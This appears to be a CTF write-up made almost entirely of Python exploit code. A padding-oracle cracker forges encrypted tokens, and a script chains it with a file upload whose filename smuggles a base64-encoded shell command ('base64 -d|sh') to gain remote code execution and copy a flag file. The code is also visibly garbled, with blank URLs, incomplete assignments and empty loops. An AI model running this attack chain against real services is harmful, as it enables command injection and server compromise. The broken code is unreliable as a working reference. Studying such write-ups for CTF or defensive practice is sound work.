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Created March 8, 2020 12:46
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NPointer 2nd web open contest write-up
import binascii
import requests
import random
from datetime import datetime
class PaddingOracleCracker():
class PaddingOracleException(Exception):
m_message = None
def Message(self): return self.m_message
def __init__(self, message):
self.m_message = message
return super(PaddingOracleCracker.PaddingOracleException, self).__init__()
class PaddingOracleUnimplementedException(PaddingOracleException): pass
# self variables
m_oracle = None
m_blockSize = 16
m_prepadding = 0
def f_unimplementedOracle(x): raise PaddingOracleCracker.PaddingOracleUnimplementedException("unimplemented - user must implement oracle. func(ct) returns True or False")
def __init__(self, oracle = None, blocksize = 16):
# The user must provide their own padding oracle function
# The default oracle will always return false
self.m_oracle = oracle if oracle else PaddingOracleCracker.f_unimplementedOracle
self.m_blockSize = blocksize
def Encrypt(self, ST):
# If we feed a BLOCKSIZE'ed random byte string (CT) to f_decrypt_pkcs(),
# it will tell us the interim (PI) decrypted byte values based
# on the unknown key. It doesn't matter that the iterim is also
# random, because it is the actual decrypted result for our chosen
# random string. The IV can be manipulated to make the make the
# interim string be anything we like:
# Note: PI xor PT == IV, and
# PI xor IV == PT
# So, we compute an IVP from our desired PT and the PI from decryption
# (below). Then, CONCAT(IV,CT) will decrypt to PT.
# This process can be repeated on any random block, even the IV
# that we just computed!! We can make the IV itself decrypt
# to any chosen PT as we did the initial CT above. THEREFORE:
# To encrypt an arbitrary string based on an unknown key using
# a padding oracle:
# 1. Define the string (ST) to encrypt.
# 2. Pad it out according to PKCS#5/7 (PT)
# 3. Create an empty accumulator (CA)
# 4. Generate an arbitrary/random block (IV)
# 5. While there are more blocks in PT to encrypt...
# 1. Push IV into front of the accumulator (CA.insert(0, IV))
# 2. Set P to next (prior) block to encrypt
# 3. Generate PI from DECRYPTOR(IV)
# 4. Compute new IV = PI ^ P
# 6. Push IV into front of the accumulator
# 7. Return the concatenation of the accumulator
PT = self.f_addPad(ST)
CA = []
IV = b''.join(self.f_genIVPrime())
while PT:
CA.insert(0, IV)
P = PT[-self.m_blockSize : ]
PT = PT[ : -self.m_blockSize]
PI = self.f_decrypt_pkcs(IV)
IV = PaddingOracleCracker.Xor(PI, P)
CA.insert(0, IV)
ret = b''.join(CA)
return ret
def Decrypt(self, CT, IV):
# For each block in the encrypted string, decrypt with the
# padding oracle.
# split CT into blocks
tmp = CT[:]
CTList = []
while tmp:
CTList.append(tmp[ : self.m_blockSize])
tmp = tmp[self.m_blockSize : ]
# generate an IV List
IVList = [IV]
for iv in CTList[ : -1]:
# decrypt each block (C2) and xor with it's IV (i.e., C1)
plainText = b''
plainIntr = b''
for C1, C2 in zip(IVList, CTList):
PI = self.f_decrypt_pkcs(C2)
plainText += PaddingOracleCracker.Xor(C1, PI)
plainIntr += PI
# return the Plain Text string with padding removed and with padding retained
return self.f_unPad(plainText), plainText
def f_decrypt_pkcs(self, CT):
# This is a decryptor specific to PKCS#5/7.
# Valid padding is a character representing the amount of padding
# repeated (padding count) times. for example:
# xxxxxxxxxxxxxxx1
# xxxxxxxxxxxxxx22
# xxxxxxxxxxxxx333
# ...
# xfffffffffffffff
# where F = 0x10 (16 decimal)
# There is always padding. If a plain text string needs no
# padding, the a full block of padding (last block in example)
# is appended.
# This internal decryptor expects a single self.m_blocksize string
# to work on.
IVP = self.f_genIVPrime() # make up a random prior block
PI = [0] * self.m_blockSize # initialize an empty interim block
j = 1
while j <= self.m_blockSize:
offt = self.m_blockSize - j
# prepare the IVP for the next pass
# we use what we learned from previous passes to
# set the last PADDING-1 bytes of the buffer to
# values that will decrypt to valid padding values.
k = offt
while k < self.m_blockSize - 1:
IVP[k+1] = bytes([PI[k+1] ^ j])
k += 1
# test every possible byte in the current position
# (if the padding oracle is 100% accurate this will
# succeed, if True is never returned, then the
# oracle does not exist or is not 100% accurate)
found = False
for i in range(256):
IVP[offt] = bytes([i]) # trial and error on the unknown position
newcipherdata = b''.join(IVP) # add our test IV
newcipherdata += CT # add encrypted text
# let the oracle decide
if self.m_oracle(newcipherdata):
#test for a special case when j==1
if j == 1:
l = j + 1
lIVP = IVP[:]
while l <= self.m_blockSize:
lofft = self.m_blockSize - l
oldval = lIVP[lofft]
lIVP[lofft] = bytes([lIVP[lofft][0] ^ 1])
lnewcipherdata = b''.join(lIVP)
lnewcipherdata += CT
if self.m_oracle(newcipherdata):
lIVP[lofft] = bytes([lIVP[lofft][0] ^ 1])
l += 1
m = j
while m < l:
mofft = self.m_blockSize - m
PI[mofft] = IVP[mofft][0] ^ (l-1)
m += 1
j = l-1
PI[offt] = i ^ j
found = True
if not found:
raise PaddingOracleException("oracle failed")
j += 1
PIs = b''.join([bytes([c]) for c in PI])
return PIs
def f_genIVPrime(self):
# generate a BLOCKSIZE'd random array of bytes
cp = []
while len(cp) < self.m_blockSize:
v = random.randrange(255)
if not v: continue
return cp
def f_addPad(self, s):
ret = s[:]
pad = len(ret) % self.m_blockSize
pad = self.m_blockSize - pad
padbuf = bytes([pad]*pad)
return ret + padbuf
def f_unPad(self, b):
ret = b[:]
pad = ret[-1]
if pad <= 0 or pad > self.m_blockSize:
raise PaddingOracleException("bad pad")
padbuf = bytes([pad]*pad)
res = ret[-pad:]
if padbuf != res:
raise PaddingOracleException("bad pad 2")
return ret[:-pad]
def Xor(cls, a, b):
x = b''
for vca,vcb in zip(a,b):
x += bytes([vca ^ vcb])
return x
if __name__ == "__main__":
url = ''
ses = requests.Session()
def oracle(ct):
while 1:
req = ses.get(url, params={"vals":binascii.b2a_hex(ct)})
if not 'invalid padding' in req.text:
return True
return False
except :
begin =
print("step1: uploading")
r ='', data={"type": "png"}, files={"file": ('test\';echo Y3AgL2ZsYWcgL2FwcC9hdHRhY2htZW50cy8x|base64 -d|sh;#\'',open('2.jpg', 'rb'), 'image/jpeg', {})}, allow_redirects=False)
print("step2: padding oracle")
poc = PaddingOracleCracker(oracle)
poc = binascii.b2a_hex(poc.Encrypt(b'{"filename":"test\';echo Y3AgL2ZsYWcgL2FwcC9hdHRhY2htZW50cy8x|base64 -d|sh;#\'","type":".show"}'))
print("step3: rce")
r = requests.get("", params={"vals": poc})
print("step4: get flag")
r = requests.get("")
end =
print("time consumed: ", (end-begin).seconds)
print("=" * 23)
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